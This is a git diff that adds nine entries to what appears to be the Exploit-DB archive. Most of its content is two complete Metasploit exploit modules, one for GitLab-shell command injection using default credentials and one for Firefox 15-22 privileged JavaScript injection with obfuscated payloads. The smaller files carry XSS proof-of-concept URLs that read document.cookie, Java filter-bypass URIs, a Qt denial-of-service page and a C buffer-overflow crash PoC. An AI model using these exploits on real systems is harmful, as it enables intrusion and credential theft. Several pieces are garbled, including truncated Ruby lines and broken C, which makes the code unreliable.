diff --git a/files.csv b/files.csv index 1ef216449..073aadf3d 100755 --- a/files.csv +++ b/files.csv @@ -30949,3 +30949,12 @@ id,file,description,date,author,platform,type,port 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0 34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0 34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80 +34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443 +34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 +34364,platforms/linux/dos/34364.html,"Qt <= 4.6.3 'QTextEngine::LayoutData::reallocate()' Memory Corruption Vulnerability",2010-07-13,D4rk357,linux,dos,0 +34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 Multiple Cross Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 +34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 'calendar' Cross Site Scripting Vulnerability",2009-11-02,"Vladimir Vorontsov",php,webapps,0 +34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 'comments.php' Multiple Cross Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 +34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 +34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0 +34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 diff --git a/platforms/jsp/webapps/34370.txt b/platforms/jsp/webapps/34370.txt new file mode 100755 index 000000000..f6b7b6e48 --- /dev/null +++ b/platforms/jsp/webapps/34370.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41925/info + +SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +SAP Netweaver 6.4 through 7.0 is vulnerable; other versions may also be affected. + +https://www.example.com/wsnavigator/jsps/explorer/help.jsp?title=Test">AAAAAAAA \ No newline at end of file diff --git a/platforms/linux/dos/34364.html b/platforms/linux/dos/34364.html new file mode 100755 index 000000000..f0aff2de7 --- /dev/null +++ b/platforms/linux/dos/34364.html @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/41873/info + +Qt is prone to a remote memory-corruption vulnerability. + +Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. + + + +Arora browser Remote Denial fo Service + + + + + +
+

==> CLICK HERE <==

+ + diff --git a/platforms/linux/remote/34362.rb b/platforms/linux/remote/34362.rb new file mode 100755 index 000000000..9baf6a2bf --- /dev/null +++ b/platforms/linux/remote/34362.rb @@ -0,0 +1,238 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Gitlab-shell Code Execution', + 'Description' => %q( + This module takes advantage of the addition of authorized + ssh keys in the gitlab-shell functionality of Gitlab. Versions + of gitlab-shell prior to 1.7.4 used the ssh key provided directly + in a system call resulting in a command injection vulnerability. As + this relies on adding an ssh key to an account valid credentials + are required to exploit this vulnerability. + ), + 'Author' => + [ + 'Brandon Knight' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'], + ['CVE', '2013-4490'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + [ 'Linux', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86 + } + ], + [ 'Linux (x64)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64 + } + ], + [ 'Unix (CMD)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'RequiredCmd' => 'openssl perl python' + }, + 'BadChars' => "\x22" + } + } + ], + [ 'Python', + { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Payload' => + { + 'BadChars' => "\x22" + } + } + ] + ], + 'CmdStagerFlavor' => %w( bourne printf ), + 'DisclosureDate' => 'Nov 4 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']), + OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']), + OptString.new('TARGETURI', [true, 'The path to Gitlab', '/']) + ], self.class) + end + + def exploit + login + case target['Platform'] + when 'unix' + execute_command(payload.encoded) + when 'python' + execute_command("python -c \\\"#{payload.encoded}\\\"") + when 'linux' + execute_cmdstager(temp: './', linemax: 2800) + end + end + + def execute_command(cmd, _opts = {}) + key_id = add_key(cmd) + delete_key(key_id) + end + + def check + res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in')) + if res && res.body && res.body.include?('GitLab') + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Unknown + end + end + + def login + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in') + + # Get a valid session cookie and authenticity_token for the next step + res = send_request_cgi( + 'method' => 'GET', + 'cookie' => 'request_method=GET', + 'uri' => signin_page + ) + + fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res + + local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0] + auth_token = res.body.scan(/ 'POST', + 'cookie' => local_session_cookie, + 'uri' => signin_page, + 'vars_post' => + { + 'utf8' => "\xE2\x9C\x93", + 'authenticity_token' => auth_token, + "#{user_field}" => username, + 'user[password]' => password, + 'user[remember_me]' => 0 + } + ) + + fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302 + + @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0] + + fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil? + end + + def add_key(cmd) + if @gitlab_version == 5 + @key_base = normalize_uri(target_uri.path.to_s, 'keys') + else + @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys') + end + + # Perform an initial request to get an authenticity_token so the actual + # key addition can be done successfully. + res = send_request_cgi( + 'method' => 'GET', + 'cookie' => "request_method=GET; #{@session_cookie}", + 'uri' => normalize_uri(@key_base, 'new') + ) + + fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res + + auth_token = res.body.scan(/ 'POST', + 'cookie' => "request_method=GET; #{@session_cookie}", + 'uri' => @key_base, + 'vars_post' => + { + 'utf8' => "\xE2\x9C\x93", + 'authenticity_token' => auth_token, + 'key[title]' => title, + 'key[key]' => key + } + ) + + fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res + + # Get the newly added key id so it can be used for cleanup + key_id = res.headers['Location'].split('/')[-1] + + key_id + end + + def delete_key(key_id) + res = send_request_cgi( + 'method' => 'GET', + 'cookie' => "request_method=GET; #{@session_cookie}", + 'uri' => @key_base + ) + + fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res + + auth_token = res.body.scan(/ 'POST', + 'cookie' => "#{@session_cookie}", + 'uri' => normalize_uri("#{@key_base}", "#{key_id}"), + 'vars_post' => + { + '_method' => 'delete', + 'authenticity_token' => auth_token + } + ) + + fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res + end +end \ No newline at end of file diff --git a/platforms/multiple/remote/34363.rb b/platforms/multiple/remote/34363.rb new file mode 100755 index 000000000..86e17a430 --- /dev/null +++ b/platforms/multiple/remote/34363.rb @@ -0,0 +1,105 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex/exploitation/jsobfu' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::BrowserExploitServer + include Msf::Exploit::Remote::BrowserAutopwn + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation + + autopwn_info({ + :ua_name => HttpClients::FF, + :ua_minver => "15.0", + :ua_maxver => "22.0", + :javascript => true, + :rank => ExcellentRanking + }) + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firefox toString console.time Privileged Javascript Injection', + 'Description' => %q{ + This exploit gains remote code execution on Firefox 15-22 by abusing two separate + Javascript-related vulnerabilities to ultimately inject malicious Javascript code + into a context running with chrome:// privileges. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'moz_bug_r_a4', # discovered CVE-2013-1710 + 'Cody Crews', # discovered CVE-2013-1670 + 'joev' # metasploit module + ], + 'DisclosureDate' => "May 14 2013", + 'References' => [ + ['CVE', '2013-1670'], # privileged access for content-level constructor + ['CVE', '2013-1710'] # further chrome injection + ], + 'Targets' => [ + [ + 'Universal (Javascript XPCOM Shell)', { + 'Platform' => 'firefox', + 'Arch' => ARCH_FIREFOX + } + ], + [ + 'Native Payload', { + 'Platform' => %w{ java linux osx solaris win }, + 'Arch' => ARCH_ALL + } + ] + ], + 'DefaultTarget' => 0, + 'BrowserRequirements' => { + :source => 'script', + :ua_name => HttpClients::FF, + :ua_ver => lambda { |ver| ver.to_i.between?(15, 22) } + } + )) + + register_options([ + OptString.new('CONTENT', [ false, "Content to display inside the HTML .", "" ]) + ], self.class) + end + + def on_request_exploit(cli, request, target_info) + send_response_html(cli, generate_html(target_info)) + end + + def generate_html(target_info) + key = Rex::Text.rand_text_alpha(5 + rand(12)) + opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin + + js = Rex::Exploitation::JSObfu.new(%Q| + var opts = #{JSON.unparse(opts)}; + var key = opts['#{key}']; + var y = {}, q = false; + y.constructor.prototype.toString=function() { + if (q) return; + q = true; + crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex"); + return 5; + }; + console.time(y); + |) + + js.obfuscate + + %Q| + + + + + #{datastore['CONTENT']} + + + | + end +end \ No newline at end of file diff --git a/platforms/multiple/remote/34369.txt b/platforms/multiple/remote/34369.txt new file mode 100755 index 000000000..f8ceb5804 --- /dev/null +++ b/platforms/multiple/remote/34369.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/41918/info + +IBM Java is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input. + +Successful exploits can allow attackers to bypass filtering mechanisms; this may aid in further attacks. + +Versions prior to IBM Java SDK 1.4.2 SR13-FP6, Java SE 5.0.0-SR12, and Java SE 6.0.0-SR9 are vulnerable. + +The following example URI's are available: + +http://www.example.com/ctx/index%c0%aehtml +http://www.example.com/ctx/index.%c1%bfj%c1%bfs%c1%bfp%c1%bf \ No newline at end of file diff --git a/platforms/php/webapps/34365.txt b/platforms/php/webapps/34365.txt new file mode 100755 index 000000000..38a48ec97 --- /dev/null +++ b/platforms/php/webapps/34365.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/41885/info + +Claus Muus Spitfire is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Claus Muus Spitfire 1.0.336 is vulnerable; prior versions may also be affected. + +http://www.example.com/site/cont_index.php?cms_id=PAGE_ID"> + +
+ +
Second code:
+ +
\ No newline at end of file diff --git a/platforms/php/webapps/34366.txt b/platforms/php/webapps/34366.txt new file mode 100755 index 000000000..1d19722d1 --- /dev/null +++ b/platforms/php/webapps/34366.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41895/info + +Twilight CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example URI is available: + +http://www.example.com/news/?calendar = "; alert (" ONsec.ru% 20Russian% 20security% 20team \ n \ n "% 2Bdocument.cookie); / / \ No newline at end of file diff --git a/platforms/php/webapps/34367.txt b/platforms/php/webapps/34367.txt new file mode 100755 index 000000000..32bb76ad2 --- /dev/null +++ b/platforms/php/webapps/34367.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41897/info + +Piwigo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Piwigo 2.0.5 is vulnerable; other versions may also be affected. + +http://www.example.com/comments.php?keyword=&since= +http://www.example.com/comments.php?author=&since= + diff --git a/platforms/windows/dos/34368.c b/platforms/windows/dos/34368.c new file mode 100755 index 000000000..d17e49234 --- /dev/null +++ b/platforms/windows/dos/34368.c @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/41912/info + +MP3 to WAV Decoder is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions. + +/* + MP3 to WAV Decoder Local Crash PoC ! + Discovered By ZAC003(4m!n) + Dl Link : http://www.mthreedev.com/setupmp3towav.exe + Greet Ciph3r for Help me ! +*/ +#include +#include +#include +#define overflow 13240 +#define mp3 "zac003.mp3" +int main (int argc,char **argv){ +char buffer[overflow]; + FILE *Player; + printf("\n******************************************"); + printf("\n* This Bug Discovered By ZAC003(4m!n) *"); + printf("\n* Special Thank To Aria-Security.CoM *"); + printf("\n* Greet Ciph3r for help me ! *"); + printf("\n******************************************"); + buffer[overflow] = 0; + Player = fopen(mp3,"w+"); + fwrite(Player,sizeof(unsigned char),sizeof(buffer),Player); + fclose(Player); + printf("\n Successfully !!"); + return 0; +}